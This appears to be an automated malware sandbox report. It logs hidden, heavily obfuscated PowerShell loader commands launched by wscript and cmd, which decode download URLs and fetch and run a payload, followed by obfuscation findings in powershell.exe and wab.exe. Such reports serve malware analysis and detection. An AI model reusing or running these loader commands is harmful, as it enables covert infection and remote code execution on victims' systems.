Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,

Contains functionality to dynamically determine API calls

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

17_2_004044A4

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0468B8D8 push eax; iretd	5_2_0468B8D9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_074709F0 push eax; mov dword ptr [esp], ecx	5_2_07470E7C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D72806 push ecx; ret	10_2_23D72819
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044693D push ecx; ret	17_2_0044694D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044DB70 push eax; ret	17_2_0044DB84
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044DB70 push eax; ret	17_2_0044DBAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00451D54 push eax; ret	17_2_00451D61
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0044B090 push eax; ret	18_2_0044B0A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0044B090 push eax; ret	18_2_0044B0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00444E71 push ecx; ret	18_2_00444E81
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00414060 push eax; ret	19_2_00414074
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00414060 push eax; ret	19_2_0041409C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00414039 push ecx; ret	19_2_00414049
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004164EB push 0000006Ah; retf	19_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00416553 push 0000006Ah; retf	19_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00416555 push 0000006Ah; retf	19_2_004165C4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_0482CF28 pushfd ; ret	20_2_0482CF31
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_04823AD9 push ebx; retf	20_2_04823ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_076B0E67 push eax; mov dword ptr [esp], ecx	20_2_076B0E7C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C809AD push ecx; mov dword ptr [esp], ecx	26_2_21C809B6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_0329333A push ss; iretd	26_2_0329333B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_0329426F push cs; ret	26_2_03294279
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_0329228B push FFFFFFDFh; iretd	26_2_0329228D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_03293AF5 push 624F56A1h; ret	26_2_03293AFA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_0328FFBC push ecx; retf	26_2_0328FFE9
